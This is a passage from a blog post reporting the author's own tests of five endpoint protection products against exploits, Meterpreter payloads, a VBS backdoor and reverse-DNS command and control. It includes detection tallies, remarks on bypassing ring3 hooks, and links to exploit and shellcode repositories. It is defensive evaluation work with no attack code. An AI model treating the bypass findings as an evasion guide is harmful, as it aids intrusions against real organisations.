<td style="border-bottom: solid #595959 1.0pt; border-left: none; border-right: solid #161616 1.0pt; border-top: none; height: .2in; mso-border-bottom-alt: solid #595959 .5pt; mso-border-left-alt: solid #161616 1.0pt; mso-border-left-alt: solid #161616 1.0pt; mso-border-right-alt: solid #161616 1.0pt; padding: 0in 5.4pt 0in 5.4pt; width: 204.9pt;" valign="top" width="342"><div class="MsoNormal">
<span style="font-family: "calibri" , sans-serif; font-size: 11pt;">Detected and cleaned on delivery stage or blocked on execution<o:p></o:p></span></div>
</td>
</tr>
<tr style="height: .2in; mso-yfti-irow: 9; mso-yfti-lastrow: yes;">
<td nowrap="" style="border-bottom: solid #595959 1.0pt; border-left: solid #161616 1.0pt; border-right: solid #161616 1.0pt; border-top: none; height: .2in; mso-border-bottom-alt: solid #595959 .5pt; mso-border-left-alt: solid #161616 1.0pt; mso-border-right-alt: solid #161616 1.0pt; padding: 0in 5.4pt 0in 5.4pt; width: 252.5pt;" valign="bottom" width="421"><div class="MsoNormal">
<span style="font-family: "calibri" , sans-serif; font-size: 11pt;">DELIVERY/INSTALL: Not Hash based malware<o:p></o:p></span></div>
</td>
<td style="border-bottom: solid #595959 1.0pt; border-left: none; border-right: solid #161616 1.0pt; border-top: none; height: .2in; mso-border-bottom-alt: solid #595959 .5pt; mso-border-left-alt: solid #161616 1.0pt; mso-border-left-alt: solid #161616 1.0pt; mso-border-right-alt: solid #161616 1.0pt; padding: 0in 5.4pt 0in 5.4pt; width: 204.9pt;" valign="top" width="342"><div class="MsoNormal">
<span style="font-family: "calibri" , sans-serif; font-size: 11pt;">Detected and cleaned on delivery stage or blocked on execution<o:p></o:p></span></div>
</td>
</tr>
</tbody></table>
<div class="11BodyText">
<br /></div>
<div class="11BodyText">
<br /></div>
<h4 style="margin-left: 1.25in; text-align: left;">
<span style="font-weight: normal; mso-bidi-font-family: "Nokia Sans"; mso-fareast-font-family: "Nokia Sans";">1.1.4<span style="font-size: 7pt; font-stretch: normal; font-variant-numeric: normal; line-height: normal;">
</span></span><!--[endif]-->Command & Control</h4>
<h2 style="margin-left: 1.25in; mso-list: l2 level3 lfo1;">
<o:p></o:p></h2>
<div class="11BodyText">
Custom VBS backdoor used stealth Reverse DNS
tunnel (via nslookup) technique as a main communication method. Same method was used by DbD
exploits for downloading backdoor (viaa svchost). Normal TCP connection was used as a
communication method for Meterpreter. <o:p></o:p><br />
<br /></div>
<table border="0" cellpadding="0" cellspacing="0" class="MsoNormalTable" style="border-collapse: collapse; margin-left: 59.0pt; mso-padding-alt: 0in 5.4pt 0in 5.4pt; mso-yfti-tbllook: 1184; width: 633px;">
<tbody>
<tr style="height: 15.0pt; mso-yfti-firstrow: yes; mso-yfti-irow: 0;">
<td nowrap="" style="border-bottom: solid #595959 1.0pt; border: solid #161616 1.0pt; height: 15.0pt; mso-border-alt: solid #161616 1.0pt; mso-border-bottom-alt: solid #595959 .5pt; padding: 0in 5.4pt 0in 5.4pt; width: 190.0pt;" valign="bottom" width="317"><div align="center" class="MsoNormal" style="text-align: center;">
<b><span style="font-family: "calibri" , sans-serif; font-size: 11pt;">TEST CASE</span></b><span style="font-family: "calibri" , sans-serif; font-size: 11pt;"><o:p></o:p></span></div>
</td>
<td style="border-bottom: solid #595959 1.0pt; border-left: none; border-right: solid #161616 1.0pt; border-top: solid #161616 1.0pt; height: 15.0pt; mso-border-alt: solid #161616 1.0pt; mso-border-bottom-alt: solid #595959 .5pt; mso-border-left-alt: solid #161616 1.0pt; padding: 0in 5.4pt 0in 5.4pt; width: 190.0pt;" valign="top" width="317"><div align="center" class="MsoNormal" style="text-align: center;">
<b><span style="font-family: "calibri" , sans-serif; font-size: 11pt;">EXPECTED BEHAVIOR</span></b><span style="font-family: "calibri" , sans-serif; font-size: 11pt;"><o:p></o:p></span></div>
</td>
</tr>
<tr style="height: 15.0pt; mso-yfti-irow: 1;">
<td nowrap="" style="border-bottom: solid #595959 1.0pt; border-left: solid #161616 1.0pt; border-right: solid #161616 1.0pt; border-top: none; height: 15.0pt; mso-border-alt: solid #161616 1.0pt; mso-border-bottom-alt: solid #595959 .5pt; mso-border-top-alt: solid #161616 1.0pt; padding: 0in 5.4pt 0in 5.4pt; width: 190.0pt;" valign="bottom" width="317"><div class="MsoNormal">
<span style="font-family: "calibri" , sans-serif; font-size: 11pt;">C&C: Meterpreter TCP<o:p></o:p></span></div>
</td>
<td style="border-bottom: solid #595959 1.0pt; border-left: none; border-right: solid #161616 1.0pt; border-top: none; height: 15.0pt; mso-border-alt: solid #161616 1.0pt; mso-border-bottom-alt: solid #595959 .5pt; mso-border-left-alt: solid #161616 1.0pt; mso-border-top-alt: solid #161616 1.0pt; padding: 0in 5.4pt 0in 5.4pt; width: 190.0pt;" valign="top" width="317"><div class="MsoNormal">
<span style="font-family: "calibri" , sans-serif; font-size: 11pt;">Detected or blocked<o:p></o:p></span></div>
</td>
</tr>
<tr style="height: 15.0pt; mso-yfti-irow: 2; mso-yfti-lastrow: yes;">
<td nowrap="" style="border-top: none; border: solid #161616 1.0pt; height: 15.0pt; padding: 0in 5.4pt 0in 5.4pt; width: 190.0pt;" valign="bottom" width="317"><div class="MsoNormal">
<span style="font-family: "calibri" , sans-serif; font-size: 11pt;">C&C: Reverse DNS via svchost<o:p></o:p></span></div>
</td>
<td style="border-bottom: solid #161616 1.0pt; border-left: none; border-right: solid #161616 1.0pt; border-top: none; height: 15.0pt; mso-border-left-alt: solid #161616 1.0pt; padding: 0in 5.4pt 0in 5.4pt; width: 190.0pt;" valign="top" width="317"><div class="MsoNormal">
<span style="font-family: "calibri" , sans-serif; font-size: 11pt;">Detected <o:p></o:p></span></div>
</td>
</tr>
</tbody></table>
<div class="MsoNormal">
<br /></div>
<h3 style="margin-left: 0.5in; text-align: left; text-indent: -0.25in;">
2.<span style="font-size: 7pt; font-stretch: normal; font-variant-numeric: normal; font-weight: normal; line-height: normal;">
</span><!--[endif]-->Test files</h3>
<div>
<div class="separator" style="clear: both; text-align: center;">
</div>
Sorry, can't share samples, but could share just some sources from where I took some of them:</div>
<div>
<br /></div>
<div>
<a href="https://github.com/Cr4sh/fwexpl" style="text-indent: -0.25in;">https://github.com/Cr4sh/fwexpl</a> (ring3 -> ring0 -> SMM )<br />
<a href="https://github.com/eik00d/Reverse_DNS_Shellcode">https://github.com/eik00d/Reverse_DNS_Shellcode</a> (Reverse DNS shellcode, VBS PoC and C&C)<br />
<a href="https://www.reverse.it/">https://www.reverse.it</a> (sometimes you could find good samples here)</div>
<div class="11BodyText" style="margin-left: 172.9pt;">
<br /></div>
<h3 style="margin-left: 0.5in; text-align: left; text-indent: -0.25in;">
3.<span style="font-size: 7pt; font-stretch: normal; font-variant-numeric: normal; font-weight: normal; line-height: normal;">
</span><!--[endif]-->Results for 5 different products</h3>
<h1 style="margin-left: .5in; mso-list: l2 level1 lfo1; text-indent: -.25in;">
<o:p></o:p></h1>
<table border="0" cellpadding="0" cellspacing="0" class="MsoNormalTable" style="border-collapse: collapse; margin-left: 17.75pt; mso-padding-alt: 0in 5.4pt 0in 5.4pt; mso-yfti-tbllook: 1184; width: 795px;">
<tbody>
<tr style="height: .2in; mso-yfti-firstrow: yes; mso-yfti-irow: 0;">
<td nowrap="" style="border: solid windowtext 1.0pt; height: .2in; mso-border-alt: solid windowtext .5pt; padding: 0in 5.4pt 0in 5.4pt; width: 211.5pt;" valign="bottom" width="353"><div class="MsoNormal">
<b><span style="font-family: "calibri" , sans-serif; font-size: 11pt;">TEST CASE\Solution<o:p></o:p></span></b></div>
</td>
<td nowrap="" style="border-left: none; border: solid windowtext 1.0pt; height: .2in; mso-border-bottom-alt: solid windowtext .5pt; mso-border-right-alt: solid windowtext .5pt; mso-border-top-alt: solid windowtext .5pt; padding: 0in 5.4pt 0in 5.4pt; width: 265.5pt;" valign="bottom" width="443"><div class="MsoNormal">
<b><span style="font-family: "calibri" , sans-serif; font-size: 11pt;">5 products<o:p></o:p></span></b></div>
</td>
</tr>
<tr style="height: .2in; mso-yfti-irow: 1;">
<td style="border-top: none; border: solid windowtext 1.0pt; height: .2in; mso-border-bottom-alt: solid windowtext .5pt; mso-border-left-alt: solid windowtext .5pt; mso-border-right-alt: solid windowtext .5pt; padding: 0in 5.4pt 0in 5.4pt; width: 211.5pt;" valign="bottom" width="353"><div class="MsoNormal">
<span style="font-family: "calibri" , sans-serif; font-size: 11pt;">DELIVERY: HTML with exploits<o:p></o:p></span></div>
</td>
<td style="border-bottom: solid windowtext 1.0pt; border-left: none; border-right: solid windowtext 1.0pt; border-top: none; height: .2in; mso-border-bottom-alt: solid windowtext .5pt; mso-border-right-alt: solid windowtext .5pt; padding: 0in 5.4pt 0in 5.4pt; width: 265.5pt;" valign="bottom" width="443"><div class="MsoNormal">
<span style="font-family: "calibri" , sans-serif; font-size: 11pt;">0/5<o:p></o:p></span></div>
</td>
</tr>
<tr style="height: .2in; mso-yfti-irow: 2;">
<td style="border-top: none; border: solid windowtext 1.0pt; height: .2in; mso-border-bottom-alt: solid windowtext .5pt; mso-border-left-alt: solid windowtext .5pt; mso-border-right-alt: solid windowtext .5pt; padding: 0in 5.4pt 0in 5.4pt; width: 211.5pt;" valign="bottom" width="353"><div class="MsoNormal">
<span style="font-family: "calibri" , sans-serif; font-size: 11pt;">DELIVERY: WORD with macros<o:p></o:p></span></div>
</td>
<td style="border-bottom: solid windowtext 1.0pt; border-left: none; border-right: solid windowtext 1.0pt; border-top: none; height: .2in; mso-border-bottom-alt: solid windowtext .5pt; mso-border-right-alt: solid windowtext .5pt; padding: 0in 5.4pt 0in 5.4pt; width: 265.5pt;" valign="bottom" width="443"><div class="MsoNormal">
<span style="font-family: "calibri" , sans-serif; font-size: 11pt;">0/5<o:p></o:p></span></div>
</td>
</tr>
<tr style="height: .2in; mso-yfti-irow: 3;">
<td style="border-top: none; border: solid windowtext 1.0pt; height: .2in; mso-border-bottom-alt: solid windowtext .5pt; mso-border-left-alt: solid windowtext .5pt; mso-border-right-alt: solid windowtext .5pt; padding: 0in 5.4pt 0in 5.4pt; width: 211.5pt;" valign="bottom" width="353"><div class="MsoNormal">
<span style="font-family: "calibri" , sans-serif; font-size: 11pt;">EXPLOITTAION: ROP Shellcode<o:p></o:p></span></div>
</td>
<td style="border-bottom: solid windowtext 1.0pt; border-left: none; border-right: solid windowtext 1.0pt; border-top: none; height: .2in; mso-border-bottom-alt: solid windowtext .5pt; mso-border-right-alt: solid windowtext .5pt; padding: 0in 5.4pt 0in 5.4pt; width: 265.5pt;" valign="bottom" width="443"><div class="MsoNormal">
<span style="font-family: "calibri" , sans-serif; font-size: 11pt;">2/5 (StackPivot detection by hooks on
VirtalAlloc/VirtualProtect), 1 of them bypassed, because hooks was on ring3,
like it was https://asintsov.blogspot.de/2016/12/bypassing-exploit-protection-of-norton.html<o:p></o:p></span></div>
</td>
</tr>
<tr style="height: .2in; mso-yfti-irow: 4;">
<td style="border-top: none; border: solid windowtext 1.0pt; height: .2in; mso-border-bottom-alt: solid windowtext .5pt; mso-border-left-alt: solid windowtext .5pt; mso-border-right-alt: solid windowtext .5pt; padding: 0in 5.4pt 0in 5.4pt; width: 211.5pt;" valign="bottom" width="353"><div class="MsoNormal">
<span style="font-family: "calibri" , sans-serif; font-size: 11pt;">EXPLOITTAION: Shellcode<o:p></o:p></span></div>
</td>
<td style="border-bottom: solid windowtext 1.0pt; border-left: none; border-right: solid windowtext 1.0pt; border-top: none; height: .2in; mso-border-bottom-alt: solid windowtext .5pt; mso-border-right-alt: solid windowtext .5pt; padding: 0in 5.4pt 0in 5.4pt; width: 265.5pt;" valign="bottom" width="443"><div class="MsoNormal">
<span style="font-family: "calibri" , sans-serif; font-size: 11pt;">5/5 (detection by hooks on various
calls), 2 of them bypassed, because hooks was on ring3, like it was done
there https://asintsov.blogspot.de/2016/12/bypassing-exploit-protection-of-norton.html<o:p></o:p></span></div>
</td>
</tr>
<tr style="height: .3in; mso-yfti-irow: 5;">
<td style="border-top: none; border: solid windowtext 1.0pt; height: .3in; mso-border-bottom-alt: solid windowtext .5pt; mso-border-left-alt: solid windowtext .5pt; mso-border-right-alt: solid windowtext .5pt; padding: 0in 5.4pt 0in 5.4pt; width: 211.5pt;" valign="bottom" width="353"><div class="MsoNormal">
<span style="font-family: "calibri" , sans-serif; font-size: 11pt;">EXPLOITTAION: 1day ring0 exploit<o:p></o:p></span></div>
</td>
<td style="border-bottom: solid windowtext 1.0pt; border-left: none; border-right: solid windowtext 1.0pt; border-top: none; height: .3in; mso-border-bottom-alt: solid windowtext .5pt; mso-border-right-alt: solid windowtext .5pt; padding: 0in 5.4pt 0in 5.4pt; width: 265.5pt;" valign="bottom" width="443"><div class="MsoNormal">
<span style="font-family: "calibri" , sans-serif; font-size: 11pt;">0/5<o:p></o:p></span></div>
</td>
</tr>
<tr style="height: .2in; mso-yfti-irow: 6;">
<td style="border-top: none; border: solid windowtext 1.0pt; height: .2in; mso-border-bottom-alt: solid windowtext .5pt; mso-border-left-alt: solid windowtext .5pt; mso-border-right-alt: solid windowtext .5pt; padding: 0in 5.4pt 0in 5.4pt; width: 211.5pt;" valign="bottom" width="353"><div class="MsoNormal">
<span style="font-family: "calibri" , sans-serif; font-size: 11pt;">EXPLOITTAION: HeapSpray <o:p></o:p></span></div>
</td>
<td style="border-bottom: solid windowtext 1.0pt; border-left: none; border-right: solid windowtext 1.0pt; border-top: none; height: .2in; mso-border-bottom-alt: solid windowtext .5pt; mso-border-right-alt: solid windowtext .5pt; padding: 0in 5.4pt 0in 5.4pt; width: 265.5pt;" valign="bottom" width="443"><div class="MsoNormal">
<span style="font-family: "calibri" , sans-serif; font-size: 11pt;">1/5, by pre-allocation by well-known address: could be bypassed<o:p></o:p></span></div>
</td>
</tr>
<tr style="height: .2in; mso-yfti-irow: 7;">
<td style="border-top: none; border: solid windowtext 1.0pt; height: .2in; mso-border-bottom-alt: solid windowtext .5pt; mso-border-left-alt: solid windowtext .5pt; mso-border-right-alt: solid windowtext .5pt; padding: 0in 5.4pt 0in 5.4pt; width: 211.5pt;" valign="bottom" width="353"><div class="MsoNormal">
<span style="font-family: "calibri" , sans-serif; font-size: 11pt;">EXPLOITTAION: Exploit triggers - UAF, Bof<o:p></o:p></span></div>
</td>
<td style="border-bottom: solid windowtext 1.0pt; border-left: none; border-right: solid windowtext 1.0pt; border-top: none; height: .2in; mso-border-bottom-alt: solid windowtext .5pt; mso-border-right-alt: solid windowtext .5pt; padding: 0in 5.4pt 0in 5.4pt; width: 265.5pt;" valign="bottom" width="443"><div class="MsoNormal">
<span style="font-family: "calibri" , sans-serif; font-size: 11pt;">0/5<o:p></o:p></span></div>
</td>
</tr>
<tr style="height: .2in; mso-yfti-irow: 8;">
<td style="border-top: none; border: solid windowtext 1.0pt; height: .2in; mso-border-bottom-alt: solid windowtext .5pt; mso-border-left-alt: solid windowtext .5pt; mso-border-right-alt: solid windowtext .5pt; padding: 0in 5.4pt 0in 5.4pt; width: 211.5pt;" width="353"><div class="MsoNormal">
<span style="font-family: "calibri" , sans-serif; font-size: 11pt;">EXPLOITATION/INTSALL: DbD with VBS - BoF<o:p></o:p></span></div>
</td>
<td style="border-bottom: solid windowtext 1.0pt; border-left: none; border-right: solid windowtext 1.0pt; border-top: none; height: .2in; mso-border-bottom-alt: solid windowtext .5pt; mso-border-right-alt: solid windowtext .5pt; padding: 0in 5.4pt 0in 5.4pt; width: 265.5pt;" valign="bottom" width="443"><div class="MsoNormal">
<span style="font-family: "calibri" , sans-serif; font-size: 11pt;">4/5 (</span><span style="font-family: "calibri" , sans-serif; font-size: 11pt;">EXPLOITTAION: ROP Shellcode + EXPLOITTAION:
Shellcode + INSTALL: VBS backdoor run)<o:p></o:p></span></div>
</td>
</tr>
<tr style="height: .2in; mso-yfti-irow: 9;">
<td style="border-top: none; border: solid windowtext 1.0pt; height: .2in; mso-border-bottom-alt: solid windowtext .5pt; mso-border-left-alt: solid windowtext .5pt; mso-border-right-alt: solid windowtext .5pt; padding: 0in 5.4pt 0in 5.4pt; width: 211.5pt;" width="353"><div class="MsoNormal">
<span style="font-family: "calibri" , sans-serif; font-size: 11pt;">EXPLOITATION/INTSALL: DbD with VBS - UAF<o:p></o:p></span></div>
</td>
<td style="border-bottom: solid windowtext 1.0pt; border-left: none; border-right: solid windowtext 1.0pt; border-top: none; height: .2in; mso-border-bottom-alt: solid windowtext .5pt; mso-border-right-alt: solid windowtext .5pt; padding: 0in 5.4pt 0in 5.4pt; width: 265.5pt;" valign="bottom" width="443"><div class="MsoNormal">
<span style="font-family: "calibri" , sans-serif; font-size: 11pt;">5/5 (</span><span style="font-family: "calibri" , sans-serif; font-size: 11pt;">EXPLOITTAION: ROP Shellcode + EXPLOITTAION:
Shellcode + INSTALL: VBS backdoor run)<o:p></o:p></span></div>
</td>
</tr>
<tr style="height: .2in; mso-yfti-irow: 10;">
<td style="border-top: none; border: solid windowtext 1.0pt; height: .2in; mso-border-bottom-alt: solid windowtext .5pt; mso-border-left-alt: solid windowtext .5pt; mso-border-right-alt: solid windowtext .5pt; padding: 0in 5.4pt 0in 5.4pt; width: 211.5pt;" valign="bottom" width="353"><div class="MsoNormal">
<span style="font-family: "calibri" , sans-serif; font-size: 11pt;">EXPLOITATION/INTSALL: DbD with met64 - BoF<o:p></o:p></span></div>
</td>
<td style="border-bottom: solid windowtext 1.0pt; border-left: none; border-right: solid windowtext 1.0pt; border-top: none; height: .2in; mso-border-bottom-alt: solid windowtext .5pt; mso-border-right-alt: solid windowtext .5pt; padding: 0in 5.4pt 0in 5.4pt; width: 265.5pt;" valign="bottom" width="443"><div class="MsoNormal">
<span style="font-family: "calibri" , sans-serif; font-size: 11pt;">3/5 (</span><span style="font-family: "calibri" , sans-serif; font-size: 11pt;">EXPLOITTAION: ROP Shellcode + EXPLOITTAION:
Shellcode + DELIVERY/INSTALL: Encoded Meterpereter x64 as a drop EXE)<o:p></o:p></span></div>
</td>
</tr>
<tr style="height: .2in; mso-yfti-irow: 11;">
<td style="border-top: none; border: solid windowtext 1.0pt; height: .2in; mso-border-bottom-alt: solid windowtext .5pt; mso-border-left-alt: solid windowtext .5pt; mso-border-right-alt: solid windowtext .5pt; padding: 0in 5.4pt 0in 5.4pt; width: 211.5pt;" valign="bottom" width="353"><div class="MsoNormal">
<span style="font-family: "calibri" , sans-serif; font-size: 11pt;">EXPLOITATION/INTSALL: DbD with met64 - UAF<o:p></o:p></span></div>
</td>
<td style="border-bottom: solid windowtext 1.0pt; border-left: none; border-right: solid windowtext 1.0pt; border-top: none; height: .2in; mso-border-bottom-alt: solid windowtext .5pt; mso-border-right-alt: solid windowtext .5pt; padding: 0in 5.4pt 0in 5.4pt; width: 265.5pt;" valign="bottom" width="443"><div class="MsoNormal">
<span style="font-family: "calibri" , sans-serif; font-size: 11pt;">3/5 (</span><span style="font-family: "calibri" , sans-serif; font-size: 11pt;">EXPLOITTAION: ROP Shellcode + EXPLOITTAION:
Shellcode + DELIVERY/INSTALL: Encoded Meterpereter x64 as a drop EXE)<o:p></o:p></span></div>
</td>
</tr>
<tr style="height: .2in; mso-yfti-irow: 12;">
<td style="border-top: none; border: solid windowtext 1.0pt; height: .2in; mso-border-bottom-alt: solid windowtext .5pt; mso-border-left-alt: solid windowtext .5pt; mso-border-right-alt: solid windowtext .5pt; padding: 0in 5.4pt 0in 5.4pt; width: 211.5pt;" valign="bottom" width="353"><div class="MsoNormal">
<span style="font-family: "calibri" , sans-serif; font-size: 11pt;">EXPLOIT: 0day Macros run<o:p></o:p></span></div>
</td>
<td style="border-bottom: solid windowtext 1.0pt; border-left: none; border-right: solid windowtext 1.0pt; border-top: none; height: .2in; mso-border-bottom-alt: solid windowtext .5pt; mso-border-right-alt: solid windowtext .5pt; padding: 0in 5.4pt 0in 5.4pt; width: 265.5pt;" valign="bottom" width="443"><div class="MsoNormal">
<span style="font-family: "calibri" , sans-serif; font-size: 11pt;">2/5<o:p></o:p></span></div>
</td>
</tr>
<tr style="height: .2in; mso-yfti-irow: 13;">
<td style="border-top: none; border: solid windowtext 1.0pt; height: .2in; mso-border-bottom-alt: solid windowtext .5pt; mso-border-left-alt: solid windowtext .5pt; mso-border-right-alt: solid windowtext .5pt; padding: 0in 5.4pt 0in 5.4pt; width: 211.5pt;" valign="bottom" width="353"><div class="MsoNormal">
<span style="font-family: "calibri" , sans-serif; font-size: 11pt;">EXPLOIT: Meterpreter x86
(in mem)<o:p></o:p></span></div>
</td>
<td style="border-bottom: solid windowtext 1.0pt; border-left: none; border-right: solid windowtext 1.0pt; border-top: none; height: .2in; mso-border-bottom-alt: solid windowtext .5pt; mso-border-right-alt: solid windowtext .5pt; padding: 0in 5.4pt 0in 5.4pt; width: 265.5pt;" valign="bottom" width="443"><div class="MsoNormal">
<span style="font-family: "calibri" , sans-serif; font-size: 11pt;">1/5<o:p></o:p></span></div>
</td>
</tr>
<tr style="height: 17.4pt; mso-yfti-irow: 14;">
<td style="border-top: none; border: solid windowtext 1.0pt; height: 17.4pt; mso-border-bottom-alt: solid windowtext .5pt; mso-border-left-alt: solid windowtext .5pt; mso-border-right-alt: solid windowtext .5pt; padding: 0in 5.4pt 0in 5.4pt; width: 211.5pt;" valign="bottom" width="353"><div class="MsoNormal">
<span style="font-family: "calibri" , sans-serif; font-size: 11pt;">INSTALL: VBS backdoor run<o:p></o:p></span></div>
</td>
<td style="border-bottom: solid windowtext 1.0pt; border-left: none; border-right: solid windowtext 1.0pt; border-top: none; height: 17.4pt; mso-border-bottom-alt: solid windowtext .5pt; mso-border-right-alt: solid windowtext .5pt; padding: 0in 5.4pt 0in 5.4pt; width: 265.5pt;" valign="bottom" width="443"><div class="MsoNormal">
<span style="font-family: "calibri" , sans-serif; font-size: 11pt;">1/5<o:p></o:p></span></div>
</td>
</tr>
<tr style="height: .2in; mso-yfti-irow: 15;">
<td style="border-top: none; border: solid windowtext 1.0pt; height: .2in; mso-border-bottom-alt: solid windowtext .5pt; mso-border-left-alt: solid windowtext .5pt; mso-border-right-alt: solid windowtext .5pt; padding: 0in 5.4pt 0in 5.4pt; width: 211.5pt;" valign="bottom" width="353"><div class="MsoNormal">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://www.blogger.com/blogger.g?blogID=4711612808026791519" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"></a></div>
<span style="font-family: "calibri" , sans-serif; font-size: 11pt;">DELIVERY/INSTALL: Encoded Meterpereter x64 as a drop EXE<o:p></o:p></span></div>
</td>
<td style="border-bottom: solid windowtext 1.0pt; border-left: none; border-right: solid windowtext 1.0pt; border-top: none; height: .2in; mso-border-bottom-alt: solid windowtext .5pt; mso-border-right-alt: solid windowtext .5pt; padding: 0in 5.4pt 0in 5.4pt; width: 265.5pt;" valign="bottom" width="443"><div class="MsoNormal">
<span style="font-family: "calibri" , sans-serif; font-size: 11pt;">2/5 (AWESOME RESULTS)<o:p></o:p></span></div>
</td>
</tr>
<tr style="height: .2in; mso-yfti-irow: 16;">
<td style="border-top: none; border: solid windowtext 1.0pt; height: .2in; mso-border-bottom-alt: solid windowtext .5pt; mso-border-left-alt: solid windowtext .5pt; mso-border-right-alt: solid windowtext .5pt; padding: 0in 5.4pt 0in 5.4pt; width: 211.5pt;" valign="bottom" width="353"><div class="MsoNormal">
<span style="font-family: "calibri" , sans-serif; font-size: 11pt;">DELIVERY/INSTALL: Encoded Meterpereter x64 as a drop DLL<o:p></o:p></span></div>
</td>
<td style="border-bottom: solid windowtext 1.0pt; border-left: none; border-right: solid windowtext 1.0pt; border-top: none; height: .2in; mso-border-bottom-alt: solid windowtext .5pt; mso-border-right-alt: solid windowtext .5pt; padding: 0in 5.4pt 0in 5.4pt; width: 265.5pt;" valign="bottom" width="443"><div class="MsoNormal">
<span style="font-family: "calibri" , sans-serif; font-size: 11pt;">3/5<o:p></o:p></span></div>
</td>
</tr>
<tr style="height: .2in; mso-yfti-irow: 17;">
<td style="border-top: none; border: solid windowtext 1.0pt; height: .2in; mso-border-bottom-alt: solid windowtext .5pt; mso-border-left-alt: solid windowtext .5pt; mso-border-right-alt: solid windowtext .5pt; padding: 0in 5.4pt 0in 5.4pt; width: 211.5pt;" valign="bottom" width="353"><div class="MsoNormal">
<span style="font-family: "calibri" , sans-serif; font-size: 11pt;">DELIVERY/INSTALL: Hash based malware<o:p></o:p></span></div>
</td>
<td style="border-bottom: solid windowtext 1.0pt; border-left: none; border-right: solid windowtext 1.0pt; border-top: none; height: .2in; mso-border-bottom-alt: solid windowtext .5pt; mso-border-right-alt: solid windowtext .5pt; padding: 0in 5.4pt 0in 5.4pt; width: 265.5pt;" valign="bottom" width="443"><div class="MsoNormal">
<span style="font-family: "calibri" , sans-serif; font-size: 11pt;">4/5<o:p></o:p></span></div>
</td>
</tr>
<tr style="height: .2in; mso-yfti-irow: 18;">
<td style="border-top: none; border: solid windowtext 1.0pt; height: .2in; mso-border-bottom-alt: solid windowtext .5pt; mso-border-left-alt: solid windowtext .5pt; mso-border-right-alt: solid windowtext .5pt; padding: 0in 5.4pt 0in 5.4pt; width: 211.5pt;" valign="bottom" width="353"><div class="MsoNormal">
<span style="font-family: "calibri" , sans-serif; font-size: 11pt;">DELIVERY/INSTALL: Not Hash based malware<o:p></o:p></span></div>
</td>
<td style="border-bottom: solid windowtext 1.0pt; border-left: none; border-right: solid windowtext 1.0pt; border-top: none; height: .2in; mso-border-bottom-alt: solid windowtext .5pt; mso-border-right-alt: solid windowtext .5pt; padding: 0in 5.4pt 0in 5.4pt; width: 265.5pt;" valign="bottom" width="443"><div class="MsoNormal">
<span style="font-family: "calibri" , sans-serif; font-size: 11pt;">2/5 (it is mean, if same malware will
be changed and it will produce a new hash, than 2 products will miss it)<o:p></o:p></span></div>
</td>
</tr>
<tr style="height: .2in; mso-yfti-irow: 19;">
<td style="border-top: none; border: solid windowtext 1.0pt; height: .2in; mso-border-bottom-alt: solid windowtext .5pt; mso-border-left-alt: solid windowtext .5pt; mso-border-right-alt: solid windowtext .5pt; padding: 0in 5.4pt 0in 5.4pt; width: 211.5pt;" valign="bottom" width="353"><div class="MsoNormal">
<span style="font-family: "calibri" , sans-serif; font-size: 11pt;">EXPLOIT: IOC bypass - migration to EXPLORER (CreateRemoteThread)<o:p></o:p></span></div>
</td>
<td nowrap="" style="border-bottom: solid windowtext 1.0pt; border-left: none; border-right: solid windowtext 1.0pt; border-top: none; height: .2in; mso-border-bottom-alt: solid windowtext .5pt; mso-border-right-alt: solid windowtext .5pt; padding: 0in 5.4pt 0in 5.4pt; width: 265.5pt;" valign="bottom" width="443"><div class="MsoNormal">
<span style="font-family: "calibri" , sans-serif; font-size: 11pt;">2/5 Blocked, and again hooks, 1 product has ring3 hooks and could be bypassed<o:p></o:p></span></div>
</td>
</tr>
<tr style="height: .2in; mso-yfti-irow: 20;">
<td style="border-top: none; border: solid windowtext 1.0pt; height: .2in; mso-border-bottom-alt: solid windowtext .5pt; mso-border-left-alt: solid windowtext .5pt; mso-border-right-alt: solid windowtext .5pt; padding: 0in 5.4pt 0in 5.4pt; width: 211.5pt;" valign="bottom" width="353"><div class="MsoNormal">
<span style="font-family: "calibri" , sans-serif; font-size: 11pt;">C&C: Meterpreter TCP<o:p></o:p></span></div>
</td>
<td style="border-bottom: solid windowtext 1.0pt; border-left: none; border-right: solid windowtext 1.0pt; border-top: none; height: .2in; mso-border-bottom-alt: solid windowtext .5pt; mso-border-right-alt: solid windowtext .5pt; padding: 0in 5.4pt 0in 5.4pt; width: 265.5pt;" valign="bottom" width="443"><div class="MsoNormal">
<span style="font-family: "calibri" , sans-serif; font-size: 11pt;">3/5 will detect connection<o:p></o:p></span></div>
</td>
</tr>
<tr style="height: .2in; mso-yfti-irow: 21; mso-yfti-lastrow: yes;">
<td style="border-top: none; border: solid windowtext 1.0pt; height: .2in; mso-border-bottom-alt: solid windowtext .5pt; mso-border-left-alt: solid windowtext .5pt; mso-border-right-alt: solid windowtext .5pt; padding: 0in 5.4pt 0in 5.4pt; width: 211.5pt;" valign="bottom" width="353"><div class="MsoNormal">
<span style="font-family: "calibri" , sans-serif; font-size: 11pt;">C&C: Reverse DNS via svchost<o:p></o:p></span></div>
</td>
<td style="border-bottom: solid windowtext 1.0pt; border-left: none; border-right: solid windowtext 1.0pt; border-top: none; height: .2in; mso-border-bottom-alt: solid windowtext .5pt; mso-border-right-alt: solid windowtext .5pt; padding: 0in 5.4pt 0in 5.4pt; width: 265.5pt;" valign="bottom" width="443"><div class="MsoNormal">
<span style="font-family: "calibri" , sans-serif; font-size: 11pt;">0/5 <o:p></o:p></span></div>
</td>
</tr>
</tbody></table>
<br />
<div class="11BodyText">
<h3 style="text-align: left;">
Outcome</h3>
<div>
Of course my tests <b> does not reflect anything except the fact that those solution could pass or not just those tests</b>, exploits and backdoors chosen/created by me. On different set of exploits and samples or different attacks - we could get different results! But some general things are there:</div>
<div>
<br /></div>
<div>
<ul style="text-align: left;">
<li>No one EPP solution could protect you from 100% attacks and threats! It is mean, if targeted attack (like APT) happen, and <b>you are main target - EPP will not help you!</b> </li>
<li>Some solutions do better in exploit prevention, but suck on malware detection, other more concentrated on "malware" detection, but can't stop exploits well</li>
<li>Most exploit-protection/malware detection techniques used by EPP could be bypassed!</li>
<li>Two different solution could stop same attack(exploit), and looks like result the same, but in fact they have stopped it on different stage, and that was what important for me: earlier - better </li>
<li>Vendors do not like public tests, that's why customers like me need to run those PoC/tests to choose right product by them-self. Do not trust "public" ratings, check solution that will fit your organisation and response your threats. Gartner magic quadrant or NSS reports does nor help much!</li>
<li>Most EPP are cloud based... that creates additional problems for customers, especially if they collect to much data (like all system events on each endpoint or even files content)</li>
